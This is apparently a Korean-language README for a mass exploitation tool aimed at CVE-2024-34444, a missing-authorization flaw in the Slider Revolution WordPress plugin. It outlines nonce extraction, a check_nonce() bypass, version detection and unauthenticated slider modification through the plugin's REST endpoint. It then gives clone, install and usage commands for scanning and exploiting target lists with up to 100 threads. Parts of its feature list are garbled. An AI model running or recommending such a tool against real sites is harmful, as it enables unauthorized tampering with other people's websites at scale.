
멀티스레드 대량 스캐너 CVE-2024-34444 (권한 누락) 대상 WordPress 플러그인 Slider Revolution용. 인증되지 않은 슬라이더 데이터 수정을 위해 REST API를 통한 nonce 추출, 버전 탐지 및 익스플로잇을 자동화합니다.
CVE-2024-34444에 영향을 받는 Slider Revolution WordPress 플러그인 < 6.7.0 전문 대량 스캐너
Banner
CVE-2024-34444는 Slider Revolution WordPress 플러그인(버전 < 6.7.0)의 인증 누락 취약점입니다. 이 스캐너는 REST API 엔드포인트 /wp-json/revslider/v1/slider/save를 통해 취약한 설치를 탐지하고 익스플로잇하는 과정을 자동화합니다.
취약점 체인:
revslider_actions nonce 추출 (공개적으로 접근 가능)check_nonce() 우회readme.txt 통해)-v) 상세 로깅-o) 결과 저장git clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v